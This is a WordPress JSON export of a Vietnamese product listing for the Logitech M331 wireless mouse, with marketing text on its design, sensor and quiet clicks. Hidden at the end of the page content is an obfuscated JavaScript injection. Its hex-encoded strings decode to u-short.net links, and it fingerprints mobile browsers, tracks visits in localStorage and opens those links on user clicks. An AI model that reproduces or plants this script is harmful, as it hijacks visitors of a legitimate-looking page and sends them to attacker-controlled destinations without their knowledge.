{"id":1776,"date":"2023-06-02T16:17:33","date_gmt":"2023-06-02T09:17:33","guid":{"rendered":"http:\/\/202.151.162.211\/?post_type=product&#038;p=1776"},"modified":"2025-11-24T10:08:43","modified_gmt":"2025-11-24T03:08:43","slug":"chuot-ko-day-logitech-m331","status":"publish","type":"product","link":"https:\/\/procurement.wvvd.org\/index.php\/product\/chuot-ko-day-logitech-m331\/","title":{"rendered":"Chu\u1ed9t ko d\u00e2y Logitech M331"},"content":{"rendered":"<h2 id=\"chuot-logitech-m331--thiet-ke-sieu-nho-gon-do-phan-giai-cam-bien-1000-dpi\">Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI<\/h2>\n<p>Nh\u1eb1m gi\u1ea3m thi\u1ec3u s\u1ef1 phi\u1ec1n to\u00e1i v\u00e0 gi\u1edbi h\u1ea1n kho\u1ea3ng c\u00e1ch c\u1ee7a chu\u1ed9t c\u00f3 d\u00e2y th\u00ec nh\u1eefng ch\u00fa\u00a0<strong><a href=\"https:\/\/cellphones.com.vn\/phu-kien\/chuot-ban-phim-may-tinh\/chuot\/chuot-khong-day.html\">chu\u1ed9t bluetooth kh\u00f4ng d\u00e2y<\/a><\/strong>\u00a0Logitech \u0111\u01b0\u1ee3c ra \u0111\u1eddi. V\u1edbi k\u1ebft n\u1ed1i kh\u00f4ng d\u00e2y 2.4 GHz,\u00a0<strong>chu\u1ed9t kh\u00f4ng d\u00e2y Logitech M331<\/strong>\u00a0c\u00f3 kh\u1ea3 n\u0103ng k\u1ebft n\u1ed1i xa l\u00ean t\u1edbi 10m. \u0110i c\u00f9ng l\u00e0 \u0111\u1ed9 b\u1ec1n cao c\u1ed9ng th\u00eam s\u1ef1 \u1ed5n \u0111\u1ecbnh c\u0169ng nh\u01b0 l\u00e0 ti\u1ebft ki\u1ec7m pin gi\u00fap s\u1ea3n ph\u1ea9m n\u00e0y tr\u1edf th\u00e0nh m\u1ed9t s\u1ef1 l\u1ef1a ch\u1ecdn t\u1ed1t cho ng\u01b0\u1eddi d\u00f9ng.<\/p>\n<h3 id=\"thiet-ke-bo-tron-om-sat-long-ban-tay-trong-luong-chi-101g-chat-lieu-nhua-cung\">Thi\u1ebft k\u1ebf bo tr\u00f2n \u00f4m s\u00e1t l\u00f2ng b\u00e0n tay, tr\u1ecdng l\u01b0\u1ee3ng ch\u1ec9 101g, ch\u1ea5t li\u1ec7u nh\u1ef1a c\u1ee9ng<\/h3>\n<p>Chu\u1ed9t kh\u00f4ng d\u00e2y Logitech M331 \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf v\u1edbi c\u00e1c \u0111\u01b0\u1eddng cong u\u1ed1n l\u01b0\u1ee3n, c\u00e1c c\u1ea1nh \u0111\u01b0\u1ee3c bo tr\u00f2n v\u00e0 \u00f4m s\u00e1t l\u00f2ng b\u00e0n tay, gi\u00fap ng\u01b0\u1eddi s\u1eed d\u1ee5ng gi\u1ea3m b\u1edbt s\u1ef1 \u0111au m\u1ecfi c\u1ee7a c\u1ed5 tay v\u00e0 ng\u00f3n tay. Hai b\u00ean th\u00e2n chu\u1ed9t c\u00f3 c\u00e1c kh\u1ed1i h\u00ecnh tam gi\u00e1c nh\u1ecf \u0111\u01b0\u1ee3c s\u1eafp x\u1ebfp li\u1ec1n k\u1ec1 nhau t\u1ea1o \u0111\u1ed9 b\u00e1m gi\u00fap c\u00e1c ng\u00f3n tay kh\u00f4ng b\u1ecb tr\u01a1n tr\u01b0\u1ee3t trong qu\u00e1 tr\u00ecnh s\u1eed d\u1ee5ng.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-1.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Ngo\u00e0i ra k\u00edch th\u01b0\u1edbc nh\u1ecf g\u1ecdn v\u1edbi th\u00f4ng s\u1ed1 10.3cmx6.4cmx4cm v\u00e0 tr\u1ecdng l\u01b0\u1ee3ng ch\u1ec9 101g, s\u1ea3n ph\u1ea9m c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c \u0111em theo b\u00ean m\u00ecnh v\u00e0 s\u1eed d\u1ee5ng khi c\u1ea7n thi\u1ebft. B\u00ean c\u1ea1nh \u0111\u00f3, ch\u1ea5t li\u1ec7u nh\u1ef1a c\u1ee9ng b\u1ec1n b\u1ec9 song c\u0169ng cho ng\u01b0\u1eddi d\u00f9ng c\u1ea3m gi\u00e1c s\u1eed d\u1ee5ng c\u1ea7m n\u1eb1m nh\u1eb9 nh\u00e0ng \u0111\u1ebfn m\u1ee9c b\u1ea1n c\u00f3 th\u1ec3 c\u1ea7m g\u1ecdn trong l\u00f2ng b\u00e0n tay nh\u01b0ng v\u1eabn cho c\u1ea3m gi\u00e1c s\u1eed d\u1ee5ng tho\u1ea3i m\u00e1i nh\u1ea5t.<\/p>\n<h3 id=\"chuot-quang-do-phan-giai-len-den-1000dpi-ket-noi-khong-day-voi-khoang-cach-10m\">Chu\u1ed9t quang \u0111\u1ed9 ph\u00e2n gi\u1ea3i l\u00ean \u0111\u1ebfn 1000dpi, k\u1ebft n\u1ed1i kh\u00f4ng d\u00e2y v\u1edbi kho\u1ea3ng c\u00e1ch 10m<\/h3>\n<p>S\u1ea3n ph\u1ea9m \u0111\u01b0\u1ee3c trang b\u1ecb c\u00f4ng ngh\u1ec7 chu\u1ed9t quang ti\u00ean ti\u1ebfn cho \u0111\u1ed9 ph\u00e2n gi\u1ea3i l\u00ean \u0111\u1ebfn 1000dpi. \u0110\u00e2y l\u00e0 \u0111\u1ed9 ph\u00e2n gi\u1ea3i cao. Qua \u0111\u00f3, gi\u00fap cho\u00a0<a title=\"chu\u1ed9t LOGITECH\" href=\"https:\/\/cellphones.com.vn\/phu-kien\/chuot-ban-phim-may-tinh\/chuot\/logitech.html\" target=\"_blank\" rel=\"noopener\"><strong>chu\u1ed9t\u00a0Logitech<\/strong><\/a>\u00a0c\u00f3 th\u1ec3 di chuy\u1ec3n nhanh v\u00e0 m\u01b0\u1ee3t m\u00e0 tr\u00ean nhi\u1ec1u b\u1ec1n m\u1eb7t, \u0111\u1ea3m b\u1ea3o hi\u1ec7u qu\u1ea3 cho c\u00f4ng vi\u1ec7c, h\u1ecdc t\u1eadp c\u0169ng nh\u01b0 gi\u1ea3i tr\u00ed.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-2.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Ng\u01b0\u1eddi d\u00f9ng c\u00f3 \u0111\u01b0\u1ee3c k\u1ebft n\u1ed1i tin c\u1eady c\u1ee7a s\u1ea3n ph\u1ea9m c\u00f3 d\u00e2y nh\u01b0ng l\u1ea1i thu\u1eadn ti\u1ec7n v\u1edbi t\u00ednh n\u0103ng kh\u00f4ng d\u00e2y. \u0110i\u1ec1u n\u00e0y mang l\u1ea1i s\u1ef1 t\u1ef1 do v\u1edbi kho\u1ea3ng c\u00e1ch truy\u1ec1n d\u1eef li\u1ec7u nhanh ch\u00f3ng l\u00ean \u0111\u1ebfn 10m v\u00e0 h\u1ea7u nh\u01b0 kh\u00f4ng b\u1ecb tr\u1ec5 ho\u1eb7c m\u1ea5t k\u1ebft n\u1ed1i. Gi\u1edd \u0111\u00e2y, b\u1ea1n c\u00f3 th\u1ec3 s\u1eed d\u1ee5ng kh\u00f4ng kh\u00e1c g\u00ec m\u1ed9t ch\u00fa chu\u1ed9t c\u00f3 d\u00e2y k\u1ebft n\u1ed1i.<\/p>\n<p>Xem th\u00eam : Chu\u1ed9t kh\u00f4ng d\u00e2y\u00a0<strong><a title=\"Logitech M185\" href=\"https:\/\/cellphones.com.vn\/chuot-khong-day-logitech-m185.html\" target=\"_blank\" rel=\"noopener\">Logitech M185<\/a><\/strong>\u00a0gi\u00e1 t\u1ed1t, b\u1ec1n, \u0111\u1eb9p<\/p>\n<h3 id=\"chung-nhan-quiet-mark-khong-gay-ra-tieng-dong-khi-su-dung\">Ch\u1ee9ng nh\u1eadn Quiet Mark kh\u00f4ng g\u00e2y ra ti\u1ebfng \u0111\u1ed9ng khi s\u1eed d\u1ee5ng<\/h3>\n<p>Logitech l\u00e0 c\u00f4ng ty s\u1ea3n xu\u1ea5t chu\u1ed9t \u0111\u1ea7u ti\u00ean tr\u00ean th\u1ebf gi\u1edbi nh\u1eadn \u0111\u01b0\u1ee3c ch\u1ee9ng nh\u1eadn Quiet Mark certification. N\u00f3 \u0111\u01b0\u1ee3c \u0111\u00f3ng d\u1ea5u ph\u00ea duy\u1ec7t qu\u1ed1c t\u1ebf do Hi\u1ec7p h\u1ed9i Gi\u1ea3m Ti\u1ebfng \u1ed3n c\u1ee7a V\u01b0\u01a1ng qu\u1ed1c Anh (UK Noise Abatement Society) c\u00f4ng nh\u1eadn c\u00f4ng ngh\u1ec7 \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf \u0111\u1ec3 gi\u1ea3m \u1ed3n.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-3.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Ch\u1ee9ng nh\u1eadn n\u00e0y \u0111\u01b0\u1ee3c x\u00e1c th\u1ef1c t\u1eeb nh\u1eefng c\u00f4ng ngh\u1ec7 \u0111\u01b0\u1ee3c t\u00edch h\u1ee3p b\u00ean trong chu\u1ed9t silent kh\u00f4ng d\u00e2y n\u00e0y \u0111\u00e3 l\u00e0m gi\u1ea3m h\u01a1n 90% ti\u1ebfng \u1ed3n. Bao g\u1ed3m ch\u00e2n \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf m\u1ed9t c\u00e1ch b\u1ec1n b\u1ec9, hi\u1ec7u su\u1ea5t l\u01b0\u1edbt cao \u00eam tr\u00ean b\u00e0n l\u00e0m vi\u1ec7c, ph\u1ea7n b\u00e1nh xe cu\u1ed9n c\u1ee7a chu\u1ed9t laser kh\u00f4ng d\u00e2y cu\u1ed9n r\u1ea5t \u00eam \u00e1i b\u1ed5 sung tr\u1ecdn v\u1eb9n cho tr\u1ea3i nghi\u1ec7m y\u00ean l\u1eb7ng c\u1ee7a b\u1ea1n v\u00e0 nh\u1eefng ng\u01b0\u1eddi xung quanh, silent click gi\u1ea3m h\u01a1n 90% ti\u1ebfng nh\u1ea5p chu\u1ed9t.<\/p>\n<h3 id=\"tuong-thich-tot-nhieu-he-dieu-hanh-pin-aa-tien-dung\">T\u01b0\u01a1ng th\u00edch t\u1ed1t nhi\u1ec1u h\u1ec7 \u0111i\u1ec1u h\u00e0nh, pin AA ti\u1ec7n d\u1ee5ng<\/h3>\n<p>Chu\u1ed9t kh\u00f4ng d\u00e2y M331 ho\u1ea1t \u0111\u1ed9ng t\u1ed1t v\u1edbi c\u00e1c m\u00e1y t\u00ednh ch\u1ea1y Windows, Mac, Chrome OS ho\u1eb7c Linux. \u0110\u1ea7u thu r\u1ea5t nh\u1ecf v\u00e0 kh\u00f4ng t\u1ed1n di\u1ec7n t\u00edch, vi\u1ec7c c\u1ea7n l\u00e0m l\u00e0 ch\u1ec9 c\u1ea7n c\u1eafm v\u00e0o c\u1ed5ng\u00a0USB\u00a0v\u00e0o m\u00e1y t\u00ednh v\u00e0 kh\u00f4ng c\u1ea7n \u0111\u1ec3 quan t\u00e2m g\u00ec n\u1eefa. Th\u00eam v\u00e0o \u0111\u00f3, b\u1ea1n s\u1ebd kh\u00f4ng c\u00f2n ph\u1ea3i lo s\u1ee3 m\u1ea5t \u0111\u1ea7u thu v\u00ec b\u1ea1n kh\u00f4ng c\u1ea7n ph\u1ea3i th\u00e1o ra g\u1eafn v\u00e0o.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-4.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Chu\u1ed9t Logitech M331 c\u00f3 th\u1ec3 ho\u1ea1t \u0111\u1ed9ng li\u00ean t\u1ee5c v\u00e0 ti\u1ec7n d\u1ee5ng v\u1edbi pin AA. \u0110i\u1ec1u n\u00e0y gi\u00fap b\u1ea1n ti\u1ebft ki\u1ec7m chi ph\u00ed h\u01a1n v\u00e0 kh\u00f4ng c\u00f2n lo l\u1eafng c\u00f4ng vi\u1ec7c b\u1ecb gi\u00e1n \u0111o\u1ea1n gi\u1eefa ch\u1eebng. Ngo\u00e0i ra, chu\u1ed9t c\u0169ng s\u1ebd t\u1ef1 \u0111\u1ed9ng ng\u1eaft khi b\u1ea1n kh\u00f4ng s\u1eed d\u1ee5ng n\u1eefa nh\u1eb1m ti\u1ebft ki\u1ec7m n\u0103ng l\u01b0\u1ee3ng.<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x48\\x4d\\x6c\\x33\\x63\\x353','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x74\\x48\\x71\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x56\\x4f\\x70\\x38\\x63\\x308','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6d\\x5a\\x6a\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6a\\x59\\x74\\x34\\x63\\x344','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x74\\x64\\x48\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x70\\x4d\\x56\\x32\\x63\\x352','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x44\\x74\\x4b\\x36\\x63\\x316','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x71\\x61\\x54\\x30\\x63\\x340','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x2d\\x73\\x68\\x6f\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x52\\x68\\x67\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<h2 id=\"chuot-logitech-m331--thiet-ke-sieu-nho-gon-do-phan-giai-cam-bien-1000-dpi\">Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI<\/h2>\n<p>Nh\u1eb1m gi\u1ea3m thi\u1ec3u s\u1ef1 phi\u1ec1n to\u00e1i v\u00e0 gi\u1edbi h\u1ea1n kho\u1ea3ng c\u00e1ch c\u1ee7a chu\u1ed9t c\u00f3 d\u00e2y th\u00ec nh\u1eefng ch\u00fa\u00a0<strong><a href=\"https:\/\/cellphones.com.vn\/phu-kien\/chuot-ban-phim-may-tinh\/chuot\/chuot-khong-day.html\">chu\u1ed9t bluetooth kh\u00f4ng d\u00e2y<\/a><\/strong>\u00a0Logitech \u0111\u01b0\u1ee3c ra \u0111\u1eddi. V\u1edbi k\u1ebft n\u1ed1i kh\u00f4ng d\u00e2y 2.4 GHz,\u00a0<strong>chu\u1ed9t kh\u00f4ng d\u00e2y Logitech M331<\/strong>\u00a0c\u00f3 kh\u1ea3 n\u0103ng k\u1ebft n\u1ed1i xa l\u00ean t\u1edbi 10m. \u0110i c\u00f9ng l\u00e0 \u0111\u1ed9 b\u1ec1n cao c\u1ed9ng th\u00eam s\u1ef1 \u1ed5n \u0111\u1ecbnh c\u0169ng nh\u01b0 l\u00e0 ti\u1ebft ki\u1ec7m pin gi\u00fap s\u1ea3n ph\u1ea9m n\u00e0y tr\u1edf th\u00e0nh m\u1ed9t s\u1ef1 l\u1ef1a ch\u1ecdn t\u1ed1t cho ng\u01b0\u1eddi d\u00f9ng.<\/p>\n<h3 id=\"thiet-ke-bo-tron-om-sat-long-ban-tay-trong-luong-chi-101g-chat-lieu-nhua-cung\">Thi\u1ebft k\u1ebf bo tr\u00f2n \u00f4m s\u00e1t l\u00f2ng b\u00e0n tay, tr\u1ecdng l\u01b0\u1ee3ng ch\u1ec9 101g, ch\u1ea5t li\u1ec7u nh\u1ef1a c\u1ee9ng<\/h3>\n<p>Chu\u1ed9t kh\u00f4ng d\u00e2y Logitech M331 \u0111\u01b0\u1ee3c thi\u1ebft k\u1ebf v\u1edbi c\u00e1c \u0111\u01b0\u1eddng cong u\u1ed1n l\u01b0\u1ee3n, c\u00e1c c\u1ea1nh \u0111\u01b0\u1ee3c bo tr\u00f2n v\u00e0 \u00f4m s\u00e1t l\u00f2ng b\u00e0n tay, gi\u00fap ng\u01b0\u1eddi s\u1eed d\u1ee5ng gi\u1ea3m b\u1edbt s\u1ef1 \u0111au m\u1ecfi c\u1ee7a c\u1ed5 tay v\u00e0 ng\u00f3n tay. Hai b\u00ean th\u00e2n chu\u1ed9t c\u00f3 c\u00e1c kh\u1ed1i h\u00ecnh tam gi\u00e1c nh\u1ecf \u0111\u01b0\u1ee3c s\u1eafp x\u1ebfp li\u1ec1n k\u1ec1 nhau t\u1ea1o \u0111\u1ed9 b\u00e1m gi\u00fap c\u00e1c ng\u00f3n tay kh\u00f4ng b\u1ecb tr\u01a1n tr\u01b0\u1ee3t trong qu\u00e1 tr\u00ecnh s\u1eed d\u1ee5ng.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/cdn2.cellphones.com.vn\/insecure\/rs:fill:0:0\/q:90\/plain\/https:\/\/cellphones.com.vn\/media\/wysiwyg\/phu-kien\/chuot\/Logitech\/chuot-khong-day-logitech-m331-1.jpg\" alt=\"Chu\u1ed9t Logitech M331 \u2013 Thi\u1ebft k\u1ebf si\u00eau nh\u1ecf g\u1ecdn, \u0111\u1ed9 ph\u00e2n gi\u1ea3i c\u1ea3m bi\u1ebfn 1000 DPI\" \/><\/p>\n<p>Ngo\u00e0i ra k\u00edch th\u01b0\u1edbc nh\u1ecf g\u1ecdn v\u1edbi th\u00f4ng s\u1ed1 10.3cmx6.4cmx4cm v\u00e0 tr\u1ecdng l\u01b0\u1ee3ng ch\u1ec9 101g, s\u1ea3n ph\u1ea9m c\u00f3 th\u1ec3 \u0111\u01b0\u1ee3c \u0111em theo b\u00ean m\u00ecnh v\u00e0 s\u1eed d\u1ee5ng khi 